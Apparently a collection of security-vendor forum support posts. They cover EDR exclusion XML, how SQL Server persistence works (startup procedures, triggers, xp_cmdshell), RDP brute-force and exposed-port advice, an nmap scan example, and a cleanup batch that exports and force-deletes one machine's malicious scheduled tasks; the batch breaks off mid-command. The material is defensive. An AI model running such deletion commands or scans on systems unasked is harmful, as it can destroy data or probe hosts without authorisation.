JamesR

From @Artemis AWAD's description, I made an exclusion (which matches @thae's exclusion). I added some notes to mine to help explain the flow of logic. If this does not work, we will need the following info: Which Rule or Rules are being triggered by these commands? Sometimes you need to add an <operations> section, which is a bit more advanced to create. An example of the Triggering Event Open the details of a detection, and scroll down to the "Triggering Process" section. Provide this as a screenshot and blur out any sensitive data. Notes or Screenshot of Parent to Child relationship If the parent to PowerShell or CMD is always the same, it could be used to make the exclusion more specific. <definition> <process><!-- Single 'OR' Statement which contains a list of processes --> <operator type="OR"> <operator type="AND"><!-- PowerShell Process which can run your PS1 script --> <condition component="FileItem" property="FileName" condition="is" value="powershell.exe" /> <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.ps1" /> </operator> <operator type="AND"><!-- CMD Process which can run your BAT script --> <condition component="FileItem" property="FileName" condition="is" value="cmd.exe" /> <condition component="ProcessInfo" property="CommandLine" condition="contains" value="MyScript.bat" /> </operator> </operator> </process> </definition>

@3D Joe Ng While hardening your SQL Server is a very good idea, there is a good chance that persistence was already added to the SQL server and that detections by ESET will continue until the persistence is removed. In my last DM to you, I provided a simple way to log SQL persistence. Where you able to run the final batch file I provided? If yes, can you please supply the zip file generated? There are many types of SQL Persistence, and if your MS SQL is hosting more than one instance, each instance will need to be checked. There are the following types of MS SQL persistence: Stored Procedures At start of MS SQL service, a procedure will start and execute ever certain amount of seconds/minutes/hours A stored procedure can be "encrypted" to hide its definition from being easily seen More info on Stored Procedures here: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ Triggers DDL Triggers - Data Definition Language Triggers Server based triggers which can be set to execute when specific queries like CREATE, ALTER, or DROP are used These triggers can be "encrypted" to hide the definition from being easily seen DML Triggers - Data Manipulation Language Triggers Database based triggers which can be set to execute on specific queries like INSERT, UPDATE, or DELETE Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well Logon Triggers As their name implies, these are triggers which execute queries whenever a user logs in to MS SQL. And can theoretically, prevent a user from logging in. Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well More info on Triggers here: https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ Other notes In order to allow MS SQL to execute external applications, the use of advanced options is needed. You will want to check and disable these settings (Ensure you make not of what you changed, and monitor your SQL server for any issues afterwards. Your SQL server may have legitimately been using these settings) "show advanced options" - Allows the following settings to be used "xp_cmdshell" - Allows MS SQL to directly execute external applications like Ping.exe or any other executables on disk. "Ole Automation Procedures" - Allows MS SQL to execute Windows Script Host and VBScript macros, which allows wscript.shell to execute other executables on the computer's disk, without the use of xp_cmdshell. "clr enabled" - Allow you to store .net code inside of SQL which can be executed by a stored procedure. This is one of the more powerful ways of providing code execution to SQL. But these should easily be spotted when reviewing all stored procedures on a server.

I do not recommend simply changing the port any service uses. It is to simple to run a port scan on all ports to identify the service which is running on them and does not stop an attack on any service which is exposed to the internet. It would be better to close easily brute forced ports/services off from any inbound public IPs. If you do need to have the port open to the internet, it should be restricted only to allow specific public IP addresses, otherwise, you will end up having password guessing attacks occur. This holds true for SQL, RDP, SMB, SSH, and many many other services. If you change the default port, and expose it to the internet, you have opened the door to being attacked.

@3D Joe Ng I will be sending you a direct message shortly with some steps to help you move closer to a clean environment. What you have looks to be an MS SQL persistent threat. These are not simple clean up. These occur when MS SQL management ports (1433-1434) are exposed to the internet, and administrative credentials are successfully guessed and used. The way MS SQL persistence works, is that it can execute commands and/or scripts using an assortment of Stored Procedures which will either execute at certain time intervals or when certain actions occur on a SQL server. This can make them feel like they are scheduled tasks. What leads me to believe this is an SQL persistent threat? Its because one of your screenshots shows the main SQL process is involved in causing the detection (.\sqlservr.exe).

FTL, Thanks for the additional info. Its starting to sound like your server may be hosting Remote Desktop Services with Remote Desktop Gateway. Which will have ntoskrnl.exe listening on port 443 for RDP requests to forward to other servers. While this might be intended, the trigger event info you shared shows an IP from Russia attempting the connection (I used this site to look up the location of the IP address: https://www.maxmind.com/en/geoip-demo). I highly recommend reviewing the roles installed on the server to verify if "Remote Desktop Services" (previously called Terminal Services) is one of the installed roles. These detections could very well be a sign of an RDP Brute Force attack from undesired IP addresses. If this server is an RDP Gateway, and 443 needs to be open to the internet, I would recommend restricting which blocks of IPs you allow to connect. Geo-IP Blocking could help reduce connections from attackers, but any compromised device in your country, could continue an attack. And ensure you are using 2fa on any RDP logins (especially Admin logins). With that said, there is still a chance its not Remote Desktop Services with an RDP Gateway. That is just what I would expect at this point. If you have a list of IP Addresses which are allowed to connect, that you want to exclude from triggering this detection, you can use the following exclusion as a template to modify and meet your needs. Then you will only get detections on untrusted IP addresses: <definition> <process> <!-- Describe process to apply exclusion too --> <operator type="and"> <!-- SignatureType of 90 = Trusted --> <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/> <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\ntoskrnl.exe" /> <condition component="ProcessInfo" property="ProcessOwner" condition="is" value="nt authority\system"/> </operator> </process> <operations> <operation type="TcpIpProtocolIdentified"> <!-- List of IP Addresses to exclude from triggering detection. Accepts CIDR notation. --> <operator type="or"> <condition component="Network" property="IpAddressV4" condition="is" value="172.16.0.0/12" /> <condition component="Network" property="IpAddressV4" condition="is" value="192.168.5.123" /> </operator> </operation> </operations> </definition> Side note: RDP can be brute forced, and its not uncommon for someone to have setup a secondary admin account, with a weaker password and no 2FA, to use incase their primary account is not working (disabled due to bad passwords, or 2FA isnt functioning as expected). It is not uncommon that a ransomware attack starts with a form of brute force on exposed services (RDP, SMB, vCenter/ESXi web console, etc...). Also, if some form of Remote Code Execution is discovered, or only known to attackers, it could allow them to walk right in without authentication (In 2017 WannaCry used an RCE on SMB to spread without needing any credentials).

This could be a sign of being port scanned from the outside world. It is not uncommon to see port scans attempting to identify what service is available on each port. This means that something is testing non-standard RDP ports to see if RDP is running. Basically the equivalent of running "nmap -sV -Pn -p 445 %YourPublicIP%" where the port number does not have to be 445, but could be a range of ports, or a different port. But, I am unable to tell which port if this is what the EI Rule triggered on, or if this was Inbound or Outbound traffic from a public or private IP. As it is the ntoskrnl.exe process, I assume its potentially inbound on, 445 or something else. If you log into the EI Console, then navigate to the main "Detections" section (on the left) Clear any un-needed filters, and sent the filters to: Resolved = Unchecked Rule Name = [E0517] First drop down list on top left = Ungrouped Next we will add a column by clicking the gear on the far right, then clicking "Select Columns" and choose the following column and then click OK: Trigger Event Scroll to the right and locate the "Trigger Event" column This will give you a nice list to look at where you can easily see If it is "Inbound/Outbound" If a "Private or Public IP" was involved What port was involved If it is inbound from a Public IP, it means the identified Port is exposed to the internet and the identified IPs are testing if RDP is running on that port. If it is port 445, it should be closed off from the internet immediately. If it is inbound from a Private IP, it means that private IP is potentially performing a port scan or has some software which is not using a standard protocol to communicate with other computers. Or that you have altered the default RDP port on your network, and should follow Marcos' advice. If it is outbound and mstsc.exe is the process causing the detection (which is not shown in the data you shared), then you should just verify if you allow users to connect to RDP servers on non-standard ports and potentially lock down protocol. Hopefully this helps. There could be more possibilities than what I listed, but I commonly do see where customers did not realize they had ports like 445 exposed to the world, and EI helped to point that out for them.

@j-gray I've pinged some people internally to get the communication on that case moving.

These symptoms are not likely due to the infection, but I do have some steps for you to try before contacting your Internet Provider. According to the logs we gathered previously, you are using your home router/wifi device for DNS and one IPv6 address for DNS. That means I would apply the following troubleshooting steps: Attempt to power off and on your router/wifi and modem. This may clear it up. If this works, stop here. No need to continue. Set your computer to use specific DNS servers like Google DNS. Here are steps to try seeing if this helps. Windows key + R Type in: ncpa.cpl and press enter Right-click on the following network name and select Properties: イーサネット Find "TCP/IPv4" and right click it and select properties. Click "Advanced" then click on the DNS tab Make note of any DNS servers listed (incase you need to put them back in), then remove each one. Next click Add, and add the following one at a time. Then click OK to all of the windows and test if your internet has stabilized. 8.8.8.8 8.8.4.4 If your internet still is not stable, repeat the steps above, but at step "4. Find TCP/IPv4...", instead find "TCP/IPv6" and click properties. then Advanced > DNS and remove all DNS, and add the following 2 addresses one at a time: 2001:4860:4860::8888 2001:4860:4860::8844 If this still does not work, then you will need to contact your internet service provider to perform more troubleshooting or even default/reset your router/wifi or modem to factory defaults. Also, if this does not work, do not forget to set your DNS back to what it was before. If this does work, and you do not wish to use Google DNS, you can find many alternatives, or contact your Internet Provider to obtain the DNS Addresses they would normally provide. Side Note: Some may not like that I am having you test with Google DNS. This is just a test and feel free to use other DNS servers as you wish. In my opinion, Google DNS is just simpler to type IP Addresses for quick testing purposes, with less chance of a typo causing a problem.

"What you should do next" comes down to: Are you still seeing new detected threats by ESET? Are you still seeing PowerShell processes start? If the answer is "No" to both of the above, you are all cleaned up, and I would recommend re-running scans for the next few days...just to ensure your computer stays clean. If the answer is "Yes" to any of the above, we will need a fresh set of logs to see how behavior has changed.

@itman They were not drivers. They were text files containing PowerShell scripting and saved as .sys files. Just a simple technique to try and hide on a system. I always advise against relying on a file name and/or file path to decide what a file contains or is. In this case, the malware is reading the contents of the .sys files, and converting them to UTF8 to get PowerShell code to execute. Here is a snip it of the command being executed to read from the file, prior to executing the contents.

@mohu From looking at your logs, I can see 17 scheduled tasks which will start an assortment of wscript or powershell commands. To quickly clean this up, and to gather samples of all parts of this (including the .ps1 files Marcos asked for) follow these instructions. Open cmd as admin (in the windows search, type "CMD", then hold "CTRL+ Shift" and tap "Enter" while holding those keys) Paste in the commands at the bottom of this post and press enter (this will make copies of many files to a folder on your desktop named "findRegistryTaskCache" To paste into the CMD window, simply right click into the window. This should paste them. After the commands complete execution (they should complete fairly quickly, ignore any errors), reboot as soon as possible. After reboot, locate the "findRegistryTaskCache" folder on your desktop, right click, and send to zip and attach in a reply here. Commands to copy: MKDIR "%UserProfile%\Desktop\findRegistryTaskCache" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{236BB709-E2AF-4247-9C7E-57914DEE2329}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{236BB709-E2AF-4247-9C7E-57914DEE2329}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\B717FB2E-1486-499A-AB34-9CFBE6036FED" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\06892F7F-5E7E-46F1-8BE6-EAFC65B2BFBD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\31510FF6-8D8E-4394-9A40-C44009BC2BFC.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_1_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EDCA282-2EB6-4AAA-952E-C56A9583A995}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EDCA282-2EB6-4AAA-952E-C56A9583A995}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\F6280D7D-C236-4422-B339-22DA703CA116" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\D4A3F8CD-4E7A-49AB-9064-1508D4EA5A6A" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\65978E5F-8827-48F0-820A-8EB8709650AF.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_2_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F725CEF-48E1-4654-8D76-285E86CFE030}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F725CEF-48E1-4654-8D76-285E86CFE030}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ZngJ1z\2ADA3B78-80C2-4186-991B-6624EDB475FA" /f /q copy /Y /B "C:\Windows\System32\QJTZngJ\3D83AE2B-6318-4D11-BD2D-2E39A341CCC3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\zzcSFeCHTT\4515CFF0-D014-44F2-BABD-8EA2C1F816CE.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_3_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AB6E1CC-84CE-4E81-9A00-873FB08D7DAA}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AB6E1CC-84CE-4E81-9A00-873FB08D7DAA}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled StartjQgByaOl3" /f /q copy /Y /B "C:\WINDOWS\System32\367D3749-2C54-4201-8143-349A5D20E5CC.ps1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_4_TASK_2022.11.11_07.18.41.4500_ps1.pwsh" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7448EF08-93CA-48A1-83F0-96B6F59F99C8}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7448EF08-93CA-48A1-83F0-96B6F59F99C8}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\R1hjrhU\34A198CE-4B75-4D02-AC4D-E5A7FF71E0E4" /f /q copy /Y /B "C:\Windows\System32\wpUR1hjr\80307A32-6C94-463A-9BFD-AC3DE71A2D78" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\USxC3zQm\7CBD8B3A-B1DB-4932-8A2C-4541F2D4E1A9.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_5_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83941100-FCF4-47DA-BEFE-0049AC97DE42}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83941100-FCF4-47DA-BEFE-0049AC97DE42}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\C73681BE-B8AA-43D0-9F49-FE51DF358A49" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\9DB814C8-0DF0-4C12-854E-EAFE3CFD9C7C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\1A62C9DE-33AF-4706-9D23-E134B115A644.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_6_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{853E2F39-0932-4CA3-A794-C93850DEEE0E}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{853E2F39-0932-4CA3-A794-C93850DEEE0E}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeiprGIAcA1h" /f /q copy /Y /B "C:\WINDOWS\System32\0B0C5764-0946-4C57-BB56-FDF5374B8F6D.ps1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_7_TASK_2022.11.11_07.18.41.4500_ps1.pwsh" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E480C4-D23C-4064-8EC6-4BC175CD54D1}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E480C4-D23C-4064-8EC6-4BC175CD54D1}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\26779417-AFA6-4DAE-AA1A-44AA0FD74A84" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\6DE19372-27A2-4E43-9C1A-65A9C832D499" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\9EF6C255-3AC6-4342-9E31-12BDC6CF6897.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_8_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A6010F4-0C5D-4B57-978D-975F94E223F1}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A6010F4-0C5D-4B57-978D-975F94E223F1}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\49F2093E-007D-41BA-BEE9-01B95D44D16C" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\E35D66F9-22B6-49BE-8CB6-117714CE782A" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\70742B98-5E81-4BFC-BF92-3C29CC0F0AA3.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_9_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE54911A-0034-4FC0-9029-D0429C8B87EF}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE54911A-0034-4FC0-9029-D0429C8B87EF}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers RoNGUDy" /f /q copy /Y /B "C:\WINDOWS\System32\0y0ppope.gv3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_10_TASK_2022.11.11_07.18.41.4500_gv3.pwsh" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B83E53D6-349E-4E6B-8442-A8A595BC0A3C}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B83E53D6-349E-4E6B-8442-A8A595BC0A3C}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\ll5p0b\1DBA922B-EA59-4033-B613-AB25BAB3F5FB" /f /q copy /Y /B 